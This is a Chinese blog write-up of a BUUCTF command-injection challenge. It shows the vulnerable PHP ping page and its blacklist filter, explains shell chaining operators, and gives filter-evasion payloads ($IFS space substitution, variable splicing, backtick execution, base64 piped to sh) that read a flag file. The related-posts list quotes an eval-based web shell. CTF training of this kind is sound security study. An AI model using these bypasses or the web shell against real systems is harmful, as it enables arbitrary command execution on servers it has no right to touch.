BUU命令执行

最新推荐文章于 2023-12-15 21:32:38 发布
最新推荐文章于 2023-12-15 21:32:38 发布
阅读量91 收藏
点赞数
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aaum556/article/details/132011507
版权

CTF题目

先来看看题目:
在这里插入图片描述

1、访问题目地址,很明显提示在 URL 拼接 ip 参数,结合题目名称,可猜测是考察命令执行漏洞:
在这里插入图片描述

2、拼接 ip 参数并尝试赋值 127.0.0.1,发现是执行力 ping 命令:
在这里插入图片描述

3、拼接 ls 命令尝试进行命令执行,发现了 flag.php:
在这里插入图片描述

4、尝试直接读取flag.php,发现存在空格过滤,读取失败:
在这里插入图片描述

5、尝试使用 I F S {IFS} IFS替换空格,发现过滤了{}:
在这里插入图片描述

6、那就尝试使用$IFS$1替换空格,可绕过空格过滤,但发现还过滤flag关键词:
在这里插入图片描述

7、既然 flag.php读取失败,那就先看看index.php吧,发现了过滤规则:
在这里插入图片描述

源码如下:

<!--?php
if(isset($_GET['ip'])){
  $ip = $_GET['ip'];
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\
-->
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo " ";
  print_r($a);
}
?>

可以看到,服务端过滤了以下字符:

& / ? * < x{00}-\x{1f} ' " \ () [] {}  空格
"xxxfxxxlxxxaxxxgxxx" " " "bash"

想要读取 flag.php 文件,就必须想办法绕过上述过滤。
绕过姿势

了解完题目概况,下面就开始学习 CTF 中命令执行漏洞相关的绕过姿势。
命令联合执行

来看看命令联合执行时的一些关键词特性:
连接词	释义
;	前面的命令执行完以后,继续执行后面的命令
|	管道符,将上一条命令的输出作为下一条命令的参数(显示后面的执行结果)
||	当前面的命令执行出错时(为假)执行后面的命令
&	将任务置于后台执行
&&	前面的语句为假则直接出错,后面的也不执行,前面只能为真

比如上面的题目也可以使用| 进行命令拼接:
关键词的绕过

1、绕过空格过滤的方法

${IFS}$9
{IFS}
$IFS
${IFS}
$IFS$1 //$1改成$加其他数字貌似都行
IFS
< 
<> 
{cat,flag.php}  //用逗号实现了空格功能,需要用{}括起来
%20   (space)
%09   (tab)
X=$'cat\x09./flag.php';$X\x09表示tab,也可以用\x20)

2、禁用 cat 的方法

ps:有时会禁用cat:
解决方法是使用tac反向输出命令:
linux命令中可以加\,所以甚至可以ca\t /fl\ag



内联执行绕过

内联,就是将反引号内命令的输出作为输入执行。

?ip=127.0.0.1;cat$IFS$9`ls`

$IFS在Linux下表示为空格
$9是当前系统shell进程第九个参数持有者,始终为空字符串,$后可以接任意数字
这里$IFS$9$IFS垂直,后面加个$与{}类似,起截断作用

多种解法

学习完相关绕过姿势的理论基础,下面回到上面 CTF 实例题目中进行实战。
变量拼接

针对服务端 flag 关键词的贪婪匹配:

if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");

可构造如下 Payload 绕过:

?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

执行效果如下:
在这里插入图片描述

此处顺便补充下一些通配符的方法:

内联执行

Payload:

?ip=127.0.0.1;cat$IFS$9`ls`

内联执行,就是将反引号内命令的输出作为输入执行:
在这里插入图片描述秒题大概就是这种做法吧……
Base64编码

Payload:

?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

这也是官方的 Writeup,原理是既然过滤 bash,那就用 sh,sh 的大部分脚本都可以在 bash下运行:
在这里插入图片描述

aaum556
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BUUCTF 命令执行/文件包含类型部分wp
qq_52988816的博客
11-24 7013
BUU差不多前两页题目中的该类型题,可能会有疏漏 [网鼎杯 2020 朱雀组]Nmap 考察nmap的利用 选项 解释 -oN 标准保存 -oX XML保存 -oG Grep保存 -oA 保存到所有格式 -append-output 补充保存文件 考虑到之前另一个题 payload 127.0.0.1 | ' <?php @eval($_POST["hack"]);?> -oG hack.php' 回显hacker,经查,php被过滤,使用短标签绕过 ' <?= @eval($_PO
【CTF】buuctf web(一)——命令执行
m0_52923241的博客
07-26 2344
[ACTF2020 新生赛]Exec 抓包看看 得到信息:以post方式通过变量target传参
buuctf-write_shell(命令执行)
m0_62094846的博客
05-21 290
<?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ return $input; .
BUUCTF-Web-命令执行-[ACTF2020 新生赛]Exec
weixin_42566218的博客
03-09 4103
BUUCTF-Web-命令执行-[ACTF2020 新生赛]Exec 题目链接:BUUCTF 类型:命令注入 知识点:命令拼接符(||、;、&&…) 解题过程 这道题目比较简单,打开发现是一个ping命令执行页面,使用post接受参数 测试命令拼接符";"发现未进行过滤,拼接ls命令得到回显 target=127.0.0.1;ls 查看index.php源码发现目标未对参数进行任何过滤 target=127.0.0.1;cp index.php 1.txt 网页
BUUCTF[ACTF2020 新生赛]Exec
stars的博客
11-01 446
文章目录 打开连接发现网站有个ping功能,测试一下 考虑到这里会存在命令执行漏洞,利用它拿到flag 在这里补充一些相关的管道符 1、|(就是按位或),直接执行|后面的语句 2、||(就是逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 3、&(就是按位与),&前面和后面命令都要执行,无论前面真假 4、&&(就是逻辑与),如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令 5、;(linux下有的,和&一样的作用) 查看根目录发现f
BUU 论坛的编辑器163Editor
09-21
BUU 论坛的编辑器DianUbb.rar
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
BUU-Reveser-XMAN2018排位赛_easywasm(WebAssembly逆向分析)
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
BUUCTF 之 命令执行知识点总结
qq_49833809的博客
11-13 271
命令执行知识点总结
buuctf web入门 命令执行 逆向
weixin_74228275的博客
07-05 604
bin主要放置一些系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、mkdir、more、mount、rm、su、tar、base64等。通过post传参,传入cat flag.php,因为传入的文件一般都存放在tmp文件下,默认文件名为phpXXXXXX(后6个为随机的大小写字母)$((~$({_})))为-1,$((~$(())))$((~$(())))为-2,故可以通过这个构造出36。根据题意,需要构造出36,$(())值为0,因为~a+a=-1。
命令执行 [BUUCTF 2018]Online Tool1
m0_75178803的博客
12-15 885
打开题目我们代码审计一下如果存在xxf头且不为空,则将xxf头内容(真实的客户端ip)赋给ROMOTE_ADDR(代理服务器传过来的ip地址)这段代码主要是为了处理通过代理服务器访问网站时获取正确的客户端IP地址这里需要注意的地方:1.没有对XXF的值进行过滤,可能存在XXF注入攻击2.XXF头部可以被客户端伪造如果get姿势传入的host为空,则会使用函数来将当前文件的源代码高亮显示输出。
BUUCTF 之 [ACTF2020 新生赛]Exec(命令执行漏洞)
两个月亮
01-08 1199
这界面和这网页标题结合起来,相信给位都能猜到这个靶场中很有可能存在命令执行漏洞。文件往往位于根目录下,但也不要被反套路了。可以看到并没有我们期望的文件。这些文件夹都不需要管它,在。
buuctf:Ping Ping Ping(命令执行
zzqzzq11的博客
08-06 1295
buuctf
BUUCTF web writeup
热门推荐
stepone4ward的博客
09-11 2万+
buuctf题目的部分writeup,持续更新中
buuctf】Online tool 命令执行&RCE&nmap
qq_37301470的博客
11-21 3132
Online tool 被自己蠢到了,一句话上传成功后没看见沙盒地址,一直蚁剑连接失败。。。 有源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_
做题记录命令执行buuctfEasy Calc
zbbjya的博客
03-25 3593
题目Easy Calc 查看源代码 给提示url 还有 waf绕过 发现过滤了许多东西 查看根目录发现了flag然后我们将 用 file_get_contents() 函数先读取文件为字符串然后用 var_dump 显示字符串得到 flag 构造playload然后得到flag 题目总结 首先我们要发现是题目给的提示,当查看源代码的时候好好的去看,然后我们看到有一个waf绕过, 在不知道的情况下我们要去了解一下什么是waf绕过 然后打开php文件查看源码时命令执行的一种方式我们 根据提示开始分析看题目
BUUCTFweb刷题记录
夜幕下的灯火阑珊的博客
04-03 2847
[极客大挑战 2019]BabySQL 本题过滤了or from by where ,用双写绕过即可
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值